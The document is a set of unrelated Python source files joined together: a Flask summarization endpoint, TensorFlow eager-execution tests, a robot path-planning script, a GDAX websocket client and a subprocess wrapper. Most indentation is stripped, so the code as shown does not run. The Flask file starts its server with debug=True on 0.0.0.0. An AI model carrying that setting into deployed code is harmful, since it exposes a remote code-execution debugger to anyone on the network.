parser.add_argument('-gpu_ranks', default='0', type=str)
parser.add_argument('-log_file', default='../logs/abs_bert')
parser.add_argument('-seed', default=666, type=int)
parser.add_argument("-test_all", type=str2bool, nargs='?', const=True, default=True)
parser.add_argument("-test_from", default='../models/model_step_154000.pt')
parser.add_argument("-test_start_from", default=-1, type=int)
parser.add_argument("-train_from", default='')
parser.add_argument("-report_rouge", type=str2bool, nargs='?', const=True, default=True)
parser.add_argument("-block_trigram", type=str2bool, nargs='?', const=True, default=True)
        # Note: args = parser.parse_args() is commented out because it crashes when run under gunicorn https://github.com/benoitc/gunicorn/issues/1867
#args = parser.parse_args()
        # Workaround for the argparse/gunicorn argument conflict https://stackoverflow.com/questions/32802303/python-flask-gunicorn-error-unrecognized-arguments
args, unknown = parser.parse_known_args()
        # the most important arguments for summarization:
# args = {'task': 'abs',
# 'mode': 'test_text',
# 'model_path': '../models/',
# 'result_path': '../results/cnndm',
# 'text_src': '../raw_data/raw_text.txt',
# 'device': 'cpu', # cuda
# 'test_from': '../models/model_step_154000.pt',
# 'visible_gpus': '-1',
# 'gpu_ranks': '0',
# 'log_file': '../logs/abs_bert',
# 'max_pos': 512,
# 'dec_ff_size': 2048,
# 'dec_dropout': 0.2,
# }
# args = Map(args)
args.gpu_ranks = [int(i) for i in range(len(args.visible_gpus.split(',')))]
args.world_size = len(args.gpu_ranks)
os.environ["CUDA_VISIBLE_DEVICES"] = args.visible_gpus
init_logger(args.log_file)
device = "cpu" if args.visible_gpus == '-1' else "cuda"
device_id = 0 if device == "cuda" else -1
if (args.task == 'abs'):
if (args.mode == 'train'):
train_abs(args, device_id)
elif (args.mode == 'validate'):
validate_abs(args, device_id)
elif (args.mode == 'lead'):
baseline(args, cal_lead=True)
elif (args.mode == 'oracle'):
baseline(args, cal_oracle=True)
if (args.mode == 'test'):
cp = args.test_from
try:
step = int(cp.split('.')[-2].split('_')[-1])
except:
step = 0
test_abs(args, device_id, cp, step)
elif (args.mode == 'test_text'):
test_text_abs(args) # inference test_text_abs ONLY
elif (args.task == 'ext'):
if (args.mode == 'train'):
train_ext(args, device_id)
elif (args.mode == 'validate'):
validate_ext(args, device_id)
if (args.mode == 'test'):
cp = args.test_from
try:
step = int(cp.split('.')[-2].split('_')[-1])
except:
step = 0
test_ext(args, device_id, cp, step)
elif (args.mode == 'test_text'):
test_text_ext(args)
        # the summary text is written to results/cnndm.-1.candidate
f = open("../results/cnndm.-1.candidate", "r")
if f.mode == 'r':
out_text = f.read()
from nltk.tokenize import sent_tokenize
out_text = out_text.replace('<q>', '. ')
input_sen = out_text # 'hello! how are you? please remember capitalization. EVERY time.'
sentences = sent_tokenize(input_sen)
sentences = [sent.capitalize() for sent in sentences]
print(sentences)
text_summary = ' '.join([str(elem) for elem in sentences])
return jsonify({'text_full': raw_text, 'text_summary': text_summary})
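# A request/response sketch for this endpoint (host and port are deployment-specific):
#   GET /get_summary?raw_text=<article text>
#   -> {"text_full": "<article text>", "text_summary": "<abstractive BERT summary>"}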
@socketio.on('my event', namespace='/my_namespace')
# this method is invoked when an event called
# 'my event' is is triggered
def test_message(message):
# this triggers new event called 'i said'
emit('i said ', {'data': message['data']})
if __name__ == '__main__':
gunicorn_logger = logging.getLogger('gunicorn.error')
app.logger.handlers = gunicorn_logger.handlers
app.logger.setLevel(gunicorn_logger.level)
    # works on the local dev server
#app.run(debug=True)#socketio.run(app, debug=True) #app.run()
    # on my firstvds server (jason)
    # Note: launch with `python app.py`, not `FLASK_APP=app.py flask run`, otherwise the app binds to localhost only and clients fail with error 111 requests.exceptions.ConnectionError: ('Connection aborted.', ConnectionRefusedError(111, 'Connection refused'))
# dev server
# app.run(host = '0.0.0.0', port = 5000, debug = True)
# gunicorn
app.run(host = '0.0.0.0', port = 5005, debug = True) # 0.0.0.0 213.159.215.173 # 35.202.164.44
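    # A typical production launch with gunicorn (the `app:app` module:variable name is an assumption
    # about how this file is named/exposed):
    #   gunicorn --bind 0.0.0.0:5005 --workers 1 --timeout 300 app:app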
|
core_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for core."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.eager import context
from tensorflow.python.eager import core
from tensorflow.python.eager import execute as execute_lib
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_resource_variable_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import resource_variable_ops
def execute(op_name, num_outputs, inputs, attrs=None):
return execute_lib.execute(
op_name, num_outputs, inputs, attrs, context.context())
def truncated_normal(shape):
return execute(
b'TruncatedNormal',
1,
inputs=[shape],
attrs=('dtype', dtypes.float32.as_datatype_enum, 'T',
shape.dtype.as_datatype_enum, 'seed', 0, 'seed2', 0))[0]
class TFETest(test_util.TensorFlowTestCase):
def testContext(self):
ctx = context.Context()
self.assertTrue(ctx.executing_eagerly())
self.assertEqual('', ctx.scope_name)
ctx.scope_name = 'foo'
self.assertEqual('foo', ctx.scope_name)
self.assertEqual(context.SYNC, ctx.get_execution_mode())
ctx.set_execution_mode(context.ASYNC)
self.assertEqual(context.ASYNC, ctx.get_execution_mode())
ctx.set_execution_mode(context.SYNC)
self.assertEqual(context.SYNC, ctx.get_execution_mode())
with ctx.execution_mode(context.ASYNC):
self.assertEqual(context.ASYNC, ctx.get_execution_mode())
ctx.set_execution_mode(context.SYNC)
self.assertEqual(context.SYNC, ctx.get_execution_mode())
self.assertIsNone(ctx.summary_writer_resource)
ctx.summary_writer_resource = 'mock'
self.assertEqual('mock', ctx.summary_writer_resource)
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('GPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(None):
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('CPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testAsyncBasic(self):
ctx = context.Context(execution_mode=context.ASYNC)
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testRunMetadata(self):
context.enable_run_metadata()
t = constant_op.constant(1.0)
_ = t + t # Runs an operation which will be in the RunMetadata
run_metadata = context.export_run_metadata()
context.disable_run_metadata()
step_stats = run_metadata.step_stats
self.assertGreater(len(step_stats.dev_stats), 0)
cpu_stats = step_stats.dev_stats[0]
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
cpu_stats.device)
self.assertGreaterEqual(len(cpu_stats.node_stats), 1)
def testShouldCopy(self):
if not context.context().num_gpus():
self.skipTest('No devices other than CPUs found')
with ops.device('gpu:0'):
x = constant_op.constant(1.0)
y = array_ops.identity(x)
# The value we're testing y.device against will depend on what the behavior
# of not explicitly specifying a device in the context is. This behavior is
# subject to change (for example, in the future we may want to use GPUs, if
# available, when no device is explicitly provided)
self.assertEqual(y.device, '/job:localhost/replica:0/task:0/device:CPU:0')
def testContextSwitchStackContainsEagerMode(self):
# Eager execution has been enabled, and no other context switch has
# occurred, so `context_switches` should contain exactly one entry.
self.assertEqual(len(context.context().context_switches.stack), 1)
switch = context.context().context_switches.stack[0]
# The entry should log that eager mode was entered.
self.assertIs(switch.enter_context_fn, context.eager_mode)
# It is not possible to build a graph function when eager execution
# is enabled; the stack entry should reflect this fact.
self.assertFalse(switch.is_building_function)
def testInt32GPU(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
with ops.device('gpu:0'):
xent = nn_ops.sparse_softmax_cross_entropy_with_logits(
logits=[[0.0, 0.0]], labels=[0])
self.assertAllClose(xent, [0.69314718])
def _runInThread(self, target, args):
t = threading.Thread(target=target, args=args)
try:
t.start()
t.join()
except Exception as e:
raise e
# Test that different thread local values are initialized to the same values
# in different threads.
def testContextThreadLocalMembers(self):
def get_context_values(ctx):
return [
ctx.executing_eagerly(), ctx.scope_name, ctx.summary_writer_resource,
ctx.device_name,
ctx.num_gpus()
]
def get_values(ctx, values):
values.extend(get_context_values(ctx))
context_values = []
ctx = context.Context()
self._runInThread(get_values, (ctx, context_values))
self.assertAllEqual(context_values, get_context_values(ctx))
def testContextConfig(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
ctx = context.Context(config=config_pb2.ConfigProto(
device_count={'GPU': 0}))
self.assertEquals(0, ctx.num_gpus())
def testTensorPlacement(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
x = constant_op.constant(1.).gpu()
with context.device('gpu:0'):
y = constant_op.constant(2.)
# Add would fail if t2 were not on GPU
result = execute(
b'Add', 1, inputs=[x, y],
attrs=('T', x.dtype.as_datatype_enum))[0].cpu().numpy()
self.assertEqual(3, result)
def testResourceTensorPlacement(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
with context.device('gpu:0'):
v = resource_variable_ops.ResourceVariable(1.0)
with context.device('cpu:0'):
# Check that even though we specified the cpu device we'll run the read op
# in the device where the handle is.
self.assertAllEqual(
gen_resource_variable_ops.read_variable_op(v.handle, v.dtype), 1.0)
def testCopyBetweenDevices(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
def testCopyBetweenDevicesAsync(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
with context.execution_mode(context.ASYNC):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
context.async_wait()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
context.async_wait()
context.async_clear_error()
def testCopyScope(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
constant = constant_op.constant(1.0)
with ops.device('gpu:0'):
with context.context().device_policy(context.DEVICE_PLACEMENT_SILENT):
c = constant + 1.0
self.assertAllEqual(c, 2.0)
def testNumpyForceCPU(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
cpu = constant_op.constant([[1., 2.], [3., 4.]])
c2g = cpu.gpu()
self.assertAllEqual(c2g, cpu.numpy())
def testCopyFromCPUToCPU(self):
ta = constant_op.constant([[1, 2], [3, 4]])
tb = ta.cpu()
self.assertNotEqual(id(ta), id(tb))
self.assertAllEqual(ta, tb.numpy())
def testRegisterExceptionClass(self):
with self.assertRaises(TypeError):
pywrap_tensorflow.TFE_Py_RegisterExceptionClass(str)
pywrap_tensorflow.TFE_Py_RegisterExceptionClass(core._NotOkStatusException) # pylint: disable=protected-access
# TODO (agarwal): add tests passing incorrect typed values to attrs. id:3662
# https://github.com/imdone/tensorflow/issues/3661
def testExecuteBasic(self):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
def testExecuteBasicAsync(self):
with context.execution_mode(context.ASYNC):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
# Error: Invalid arguments
context.set_execution_mode(context.ASYNC)
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))
context.async_wait()
context.async_clear_error()
context.set_execution_mode(context.SYNC)
def testExecuteTooManyNumOutputs(self):
# num_outputs provided is 50, but only one output is produced.
product = execute(
b'Mul',
num_outputs=50,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual(15, product)
def testExecuteTooFewNumOutputs(self):
# num_outputs provided is 0, but one output is produced.
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'Mul',
num_outputs=0,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
def testMatMulGPU(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
three = constant_op.constant([[3.]]).gpu()
five = constant_op.constant([[5.]]).gpu()
product = execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))[0]
self.assertAllEqual([[15.0]], product)
def testExecuteStringAttr(self):
checked_three = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 'just checking', 'T',
dtypes.float32.as_datatype_enum))[0]
self.assertEqual([[3]], checked_three.numpy())
def testExecuteStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 1, 'T', dtypes.float32.as_datatype_enum))
def testExecuteFloatAttr(self):
almost_equal = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', 0.3, 'T', dtypes.float32.as_datatype_enum))[0]
self.assertTrue(almost_equal)
def testExecuteFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', '0.3', 'T', dtypes.float32.as_datatype_enum))
def testExecuteIntAttr(self):
total = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', 2))[0]
self.assertAllEqual(7, total)
def testExecuteIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', '2'))
# Looks like we don't have an existing op with list(bool) attrs.
def testExecuteBoolAttr(self):
product = execute(
b'MatMul',
num_outputs=1,
inputs=[constant_op.constant([[3]]),
constant_op.constant([[5]])],
attrs=('transpose_a', True, 'transpose_b', False, 'T',
dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual([[15]], product)
def testExecuteShapeAttr(self):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [1, 2], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', 1, 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteListStringAttr(self):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description',
'tensor_summary', 'labels', ['3',
'summary'], 'display_name', 'test'))
def testExecuteListStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', 3, 'display_name', 'test'))
def testExecuteListStringAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', [3], 'display_name', 'test'))
def testExecuteListFloatAttr(self):
b = execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', [4.0,
6.0]))[0]
self.assertAllEqual([0, 1, 2], b)
def testExecuteListFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', 4.0))
def testExecuteListFloatAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries',
['4.0', '6.0']))
def testExecuteListIntAttr(self):
b = execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', [0, 2]))[0]
self.assertAllEqual([3], b)
def testExecuteListIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', 0))
def testExecuteListIntAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims',
['0', '2']))
def testExecuteListTypeListShapeAttr(self):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', dtypes.float64.as_datatype_enum, 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', '1', 'shapes', [[1, 2]], 'capacity', -1,
'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1, 2], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteMultipleOutputs(self):
split_dim = 1
value = [[0, 1, 2], [3, 4, 5]]
x1, x2, x3 = execute(
b'Split',
num_outputs=3,
inputs=[constant_op.constant(split_dim),
constant_op.constant(value)],
attrs=('num_split', 3, 'T', dtypes.int32.as_datatype_enum))
self.assertAllEqual([[0], [3]], x1)
self.assertAllEqual([[1], [4]], x2)
self.assertAllEqual([[2], [5]], x3)
def testExecuteBadNumOutputsArgument(self):
with self.assertRaises(TypeError):
execute(
b'Relu', [],
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum))
def testExecuteUnknownOp(self):
with self.assertRaises(errors.NotFoundError):
execute(b'BlahBlahBlah', num_outputs=1, inputs=[], attrs=None)
def testExecuteUnknownAttr(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Identity',
num_outputs=1,
inputs=[constant_op.constant(3)],
attrs=('T', dtypes.int32.as_datatype_enum, 'unknown_attr', 'blah'))
def testComposition(self):
def add(x, y):
return execute(
b'Add',
num_outputs=1,
inputs=[x, y],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
x = constant_op.constant(1)
three_x = add(add(x, x), x)
self.assertEquals(dtypes.int32, three_x.dtype)
self.assertAllEqual(3, three_x)
def testOperationWithNoInputsRunsOnDevice(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
shape = constant_op.constant([], dtype=dtypes.int32)
# x: Run the "TruncatedNormal" op CPU and copy result to GPU.
x = truncated_normal(shape).gpu()
# y: Explicitly run the "TruncatedNormal" op on GPU.
with context.device('gpu:0'):
y = truncated_normal(shape)
# Add would fail if x and y were not on the same device.
execute(
b'Add', 1, inputs=[x, y], attrs=('T', x.dtype.as_datatype_enum))
def testInvalidDevice(self):
with self.assertRaises(ValueError):
with context.device('pu:0'):
_ = constant_op.constant(1)
def testConvertMixedEagerTensors(self):
array = np.zeros((), dtype=np.float32)
tensor = constant_op.constant(0., dtype=dtypes.float32)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
[array, tensor], context.context())
for typ, t in zip(types, tensors):
self.assertEquals(typ, dtypes.float32)
self.assertIsInstance(t, ops.EagerTensor)
class SendRecvTest(test_util.TensorFlowTestCase):
cpu_device = '/job:localhost/replica:0/task:0/device:CPU:0'
def _send(self, tensor, tensor_name, to_device):
return execute(
b'_Send', num_outputs=0, inputs=[tensor],
attrs=('T', tensor.dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', tensor.device,
'send_device_incarnation', 0,
'recv_device', to_device,
'client_terminated', True))
def _recv(self, dtype, tensor_name, from_device):
device_name = context.context().device_name
if not device_name:
device_name = self.cpu_device
return execute(
b'_Recv', num_outputs=1, inputs=[],
attrs=('tensor_type', dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', from_device,
'send_device_incarnation', 0,
'recv_device', device_name,
'client_terminated', False))[0]
def testBasic(self):
t0 = constant_op.constant(1.0)
t1 = constant_op.constant(2.0)
self._send(t0, 't0', self.cpu_device)
self._send(t1, 't1', self.cpu_device)
self.assertAllEqual(
self._recv(dtypes.float32, 't0', self.cpu_device),
1.0)
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
def testLocalCrossDevice(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
gpu_device_name = '/job:localhost/replica:0/task:0/device:GPU:0'
with ops.device('GPU:0'):
t0 = constant_op.constant(1.0)
self._send(t0, 't0', self.cpu_device)
with ops.device('cpu:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't0', gpu_device_name),
1.0)
self._send(constant_op.constant(2.0), 't1', gpu_device_name)
with ops.device('GPU:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
if __name__ == '__main__':
test.main()
|
multi_scene.py
|
from ana import ANASearch
from astar import AstarSearch
import numpy as np
from playground_generator import PybulletPlayground
import random
import multiprocessing as mp
def search(i):
path_len = 0
while True:
seed = random.randint(1,100000)
random.seed(seed)
print('[Start: Seed={}]'.format(seed))
# generate random scene
# x_max, y_max, x_step, y_step, x_noise, y_noise = (8, 4, 1.5, 1.5, 1, 1)
x_max, y_max, x_step, y_step, x_noise, y_noise = (6, 4, 1.5, 2, 1, 0.5)
floor_size = (x_max*2, y_max*2)
obstacle_config = [
(
i+(random.random()-0.5)*2*x_noise,
j+(random.random()-0.5)*2*y_noise,
random.random()*np.pi
)
for i in np.arange(-x_max+x_step, x_max, x_step)
for j in np.arange(-y_max+y_step, y_max, y_step)
]
margin = 3
# obstacle_config = [c for c in obstacle_config if not (c[0]<-x_max+margin and c[1]<-y_max+margin)]
# obstacle_config = [c for c in obstacle_config if not (c[0]>x_max-margin and c[1]>y_max-margin)]
obstacle_config = [c for c in obstacle_config if not (np.linalg.norm([c[0]+x_max,c[1]])<margin or np.linalg.norm([c[0]-x_max,c[1]])<margin)]
playground = PybulletPlayground('pr2playground_template.json')
playground_filename = 'dist/pr2playground {}.json'.format(seed)
playground.generate(playground_filename, floor_size, obstacle_config)
# set searching arguments
args = {
'n_connected': 4,
'grid_size': [0.1, 0.1, np.pi/2],
'start_config': (-x_max+0.5, 0, np.pi/2),
'goal_config': (x_max-1, 0, -np.pi/2),
'timeout': 300,
'camera_distance': 10,
'angle_disabled': True,
'verbose': False
}
# conduct search
ana = ANASearch(**args)
astar = AstarSearch(**args)
history_ana = ana.search(use_gui=False, map=playground_filename)
path_len = len(history_ana)
if path_len>2:
print('[Found: Seed={}, path={}]'.format(seed, path_len))
return
elif path_len>0:
print('[Stop: Seed={}, path={}]'.format(seed, path_len))
if __name__ == '__main__':
process_list = []
for i in range(mp.cpu_count()-2):
p = mp.Process(target=search, args=(i,))
process_list.append(p)
p.start()
for p in process_list:
p.join()
|
gdax.py
|
# Import Built-Ins
import logging
import json
import threading
import time
# Import Third-Party
from websocket import create_connection, WebSocketTimeoutException
import requests
# Import Homebrew
from .base import WSSAPI
# Init Logging Facilities
log = logging.getLogger(__name__)
class GDAXWSS(WSSAPI):
def __init__(self):
super(GDAXWSS, self).__init__('wss://ws-feed.gdax.com', 'GDAX')
self.conn = None
r = requests.get('https://api.gdax.com/products').json()
self.pairs = [x['id'] for x in r]
self._data_thread = None
def start(self):
super(GDAXWSS, self).start()
self._data_thread = threading.Thread(target=self._process_data)
self._data_thread.daemon = True
self._data_thread.start()
def stop(self):
super(GDAXWSS, self).stop()
self._data_thread.join()
def _process_data(self):
self.conn = create_connection(self.addr, timeout=4)
payload = json.dumps({'type': 'subscribe', 'product_ids': self.pairs})
self.conn.send(payload)
while self.running:
try:
data = json.loads(self.conn.recv())
except (WebSocketTimeoutException, ConnectionResetError):
                self._controller_q.put('restart')
                continue  # `data` is undefined/stale after a failed recv(), so skip this iteration
if 'product_id' in data:
self.data_q.put(('order_book', data['product_id'],
data, time.time()))
self.conn = None
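# A minimal consumption sketch (illustrative; relies on the queues provided by the WSSAPI base class):
#
#   wss = GDAXWSS()                              # fetches the available product ids via REST on construction
#   wss.start()                                  # spawns the websocket reader thread
#   channel, pair, data, ts = wss.data_q.get()   # blocks until one order-book message arrives
#   wss.stop()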
|
command.py
|
# Copyright 1996-2020 Cyberbotics Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Launch a system command."""
import os
import subprocess
import sys
import threading
class Command(object):
"""Launch a system command."""
def __init__(self, cmd, ansiEscape=False):
"""Constructor."""
self.ansiEscape = ansiEscape
self.cmd = cmd.split()
self.resetAttributes()
self.mainProcessMutex = threading.Lock()
def resetAttributes(self):
"""Reset the internal attributes."""
self.expectedStringFound = False
self.isTimeout = False
self.mainProcess = None
self.mainThread = None
self.returncode = 0
self.output = ''
def terminate(self, force):
"""Terminate the command."""
self.isRunningFlag = False
if self.mainProcess:
self.mainProcess.terminate()
if force and sys.platform == 'darwin' and self.mainProcess:
self.mainProcess.kill()
def isRunning(self):
"""Detect if the command is running."""
return self.mainProcess is not None
def stopMainProcess(self):
"""Stop the main process."""
if self.mainProcess:
self.mainProcess.terminate()
if self.mainThread:
self.mainThread.join()
self.mainProcess = None
self.mainThread = None
def run(self, timeout=None, expectedString=None, silent=True,
forceTermination=True, shell=False, redirectionFile=None):
"""Run the command and monitor STDERR and STDOUT pipe."""
def mainTarget():
if self.redirectionFile is None:
self.mainProcess = subprocess.Popen(
self.cmd, shell=self.shell, bufsize=1, universal_newlines=True,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
else:
outFile = open(self.redirectionFile, "w")
self.mainProcess = subprocess.Popen(
self.cmd, shell=self.shell, bufsize=1, universal_newlines=True,
stdout=outFile, stderr=outFile)
while self.mainProcess.poll() is None:
self.mainProcess.wait()
self.returncode = self.mainProcess.returncode
with self.mainProcessMutex:
self.mainProcess = None
if self.redirectionFile is not None:
outFile.close()
def outputWriterTarget():
while self.isRunningFlag:
line = ''
with self.mainProcessMutex:
if self.mainProcess:
line = self.mainProcess.stdout.readline() # blocking
if line:
self.output += line
if not self.silent:
if self.ansiEscape:
if line.startswith("OK: "):
line = '\033[92m' + line # green
elif line.startswith("FAILURE"):
line = '\033[91m' + line # red
else:
line = '\033[0m' + line
print(line[:-1])
if sys.platform == 'win32':
sys.stdout.flush()
def outputListenerTarget():
size = 0
while self.isRunningFlag:
if size != len(self.output):
if self.expectedString in self.output:
self.expectedStringFound = True
self.terminate(force=True)
return
size = len(self.output)
self.resetAttributes()
self.expectedString = expectedString
self.silent = silent
self.timeout = timeout
self.shell = shell
self.redirectionFile = redirectionFile
self.isRunningFlag = True
try:
self.outputWriterThread = threading.Thread(
target=outputWriterTarget)
self.outputWriterThread.start()
if expectedString:
self.outputListenerThread = threading.Thread(
target=outputListenerTarget)
self.outputListenerThread.start()
self.mainThread = threading.Thread(target=mainTarget)
self.mainThread.start()
self.mainThread.join(timeout)
self.isRunningFlag = False
if self.mainProcess and self.mainThread.is_alive(): # timeout case
self.isTimeout = True
if forceTermination:
self.stopMainProcess()
except (KeyboardInterrupt, SystemExit):
self.isRunningFlag = False
